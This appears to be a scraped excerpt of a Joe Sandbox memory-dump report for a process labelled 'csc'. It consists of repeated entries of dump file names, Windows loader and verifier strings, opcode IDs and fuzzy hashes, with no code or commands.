• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 05C6A21B
• RtlpResUltimateFallbackInfo Exit, xrefs: 05C6A229
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
Strings
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
• API String ID: 0-118005554
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                                                                                                                  • Opcode ID: 7b13787546858e78afd031faa9c65f18cd6641194a8d1f3fb544be13af2b11c8
                                                                                                                                                                                                                                                                                  • Instruction ID: 77cd07110c40dd006cf616ae2776d901183fd16bd4d20dfe58a1237e5012e266
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b13787546858e78afd031faa9c65f18cd6641194a8d1f3fb544be13af2b11c8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC41DE726083099BD720EA75C848F6FB7ECAF88B04F040E6DF585E7580E674DA04D79A
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                  • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                                                                  • Instruction ID: 63dbce5fc17eae888375058c83588bd8784db135290bf26f43350768bc7b126f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351AD72604711AFC324CF19C844A6BBBF8FF48710F00892EFA95976A0E7B4E915CB91
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                                                                                                                                                  • Opcode ID: bf96451ff4ee28b355228cd7aa2508e12cfb74caee77461d6f1324ebdbe16b1b
                                                                                                                                                                                                                                                                                  • Instruction ID: 55413b9f41215d8edc7a3336362113ced47fafe916df3994ed7bc936609dd30c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf96451ff4ee28b355228cd7aa2508e12cfb74caee77461d6f1324ebdbe16b1b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF31D6717103029FDB258F5CA851B36B7E5FB89314F94882AE909DF381FA718E81C790
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                                                                  • Instruction ID: 747af808493494797a88124ba3bb675bdb3f1b7fa00c89061ffa605bd2df17e6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D841C1B5A0051ADBCF29DF88C484BBEBBB6FF41705F00485AE941A7201D734DA41CBE1
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Flst
                                                                                                                                                                                                                                                                                  • API String ID: 0-2374792617
                                                                                                                                                                                                                                                                                  • Opcode ID: 6977f507f35f5d91f5fbd7807199c283d3968d5af256c3be6618fb552c37f5ef
                                                                                                                                                                                                                                                                                  • Instruction ID: 72fd83a08dacde6b8d9e0590d3db86adc0ae4c03c7260ec0d174a754808e2a74
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6977f507f35f5d91f5fbd7807199c283d3968d5af256c3be6618fb552c37f5ef
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541DBB1208341DFCB08CF18C188A26FBE5FB89B14F14896EE55ACB341D771CA42CBA1
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                                                                                                                                                  • Opcode ID: f8df1d5413ac489e50ab4145ebf875d31eb78de22e4ed4bc4d84297921bc8ad3
                                                                                                                                                                                                                                                                                  • Instruction ID: 56a956e6b206ac9465bf3d382fc4d6806894455cbcc0f2b6408488742269be8c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8df1d5413ac489e50ab4145ebf875d31eb78de22e4ed4bc4d84297921bc8ad3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31E376A0451AEFDB16DA58C949E7FFBB5EF80B20F024929EA05E7650D7309E00D7E0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 05CE85DE
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
• Opcode ID: 7c45f096c5ca91df113235ea07918fb0da27ed565e30f0bbdb14e172495c16bd
• Instruction ID: 11f8fdd2f2b817b200e0d0cc98c2b8e9914b5b4d4c8ee623ff9322ecb788cacb
• Opcode Fuzzy Hash: 7c45f096c5ca91df113235ea07918fb0da27ed565e30f0bbdb14e172495c16bd
• Instruction Fuzzy Hash: 9B012B323047009BDA365B55A888E567F7EFF43264F441C29E40307551CF30B980EBA5
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fcf07d9b9352650384f6f765b1b3016ec8ad963effff46a0a3f61ddbbf742a99
                                                                                                                                                                                                                                                                                  • Instruction ID: fdf83a2924cf783222850f1d0e36a4c4085719f7978ac03d030f16af66d965de
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcf07d9b9352650384f6f765b1b3016ec8ad963effff46a0a3f61ddbbf742a99
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D427E71A046168FEF19CF59C490ABEB7F6FF88314F148959D852AB380D774E942CBA0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ffe43543a600b253727e2321f287789d01a6b98c7b632cd3b4d5afb518741563
                                                                                                                                                                                                                                                                                  • Instruction ID: ff77ae96820f9a5c3212dc2d5d496e0788db60fddd77ab167f1eb350b541b080
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffe43543a600b253727e2321f287789d01a6b98c7b632cd3b4d5afb518741563
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21327E76E00219DBCB14EF99C895BBEBBB6FF44718F180569E806AB350DB359D01CB90
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b6c62f46d489290a19c689ac2743005472cb7e860354447e03a6df101af3b82d
                                                                                                                                                                                                                                                                                  • Instruction ID: 959f0cb43edd409c1bf10f1946f42a3188d25bcc9c04e7908f9c95e8d2b0d8d1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c62f46d489290a19c689ac2743005472cb7e860354447e03a6df101af3b82d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9032F074A047588FDB24CF69CA44BBEBBF2FF84304F24499ED4469B684D735A982CB50
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 63b8ce7c222c59375a60b018787937aa297c5d348c92f6f8344c82a8c3a0f2f9
                                                                                                                                                                                                                                                                                  • Instruction ID: a676242ec0497042d014a1155099e65620c63faf7b7dab1177a7e69e671a1b93
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b8ce7c222c59375a60b018787937aa297c5d348c92f6f8344c82a8c3a0f2f9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE16B71608341CFC714CF28C0D4A6ABBE2FF89318F158A6DE59597351DB31EA86CB92
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3b37c688b02d897624395c2a5e16d33817123ae53261b3e28337da2966aa9b86
                                                                                                                                                                                                                                                                                  • Instruction ID: 56480751bbdd395b4bd97ec04d7e7a1404d75dc6b9ba93575c103f27ffd6d4ca
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b37c688b02d897624395c2a5e16d33817123ae53261b3e28337da2966aa9b86
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C1D675B042569BDB24CF59C884BAEBBB2BF44714F14CD9DE816AB280D770EA41CBC1
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ffca18ea08acf531c4a1b5a9a544036c44c240d423cb0d2352a867066abf05ec
                                                                                                                                                                                                                                                                                  • Instruction ID: 1e3077e60de9d0a007b71c65f6dbb56ac167c4f85ced369475f527608b68dbed
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffca18ea08acf531c4a1b5a9a544036c44c240d423cb0d2352a867066abf05ec
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECD11575A002099FDB51DF69C984B9ABBF9FF48344F08487AEE09DB216D771D901CBA0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                                                                                                                                                                                  • Instruction ID: 2c92bde6889d5395eaea396953bef0eef6560ba6340362115976c8515f1e84b8
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2B12531704649AFDB29CB65C8A4BBEBBB6FF84204F144999D952EB680D730DA40CB54
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 1b6a84c912b678e1860d65b74e8b0a1df4764b3b5eb885b961f3fa63d1af1ed2
                                                                                                                                                                                                                                                                                  • Instruction ID: 3e4765d378f7145ac53d56b9be94b5a9bcfa599d6c23f5b8183eaa63fbc4f4d3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b6a84c912b678e1860d65b74e8b0a1df4764b3b5eb885b961f3fa63d1af1ed2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DA10A31F04619AFDB21DB98C848BBEBFAABB05718F050959E911AB290D7749E44C7C1
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
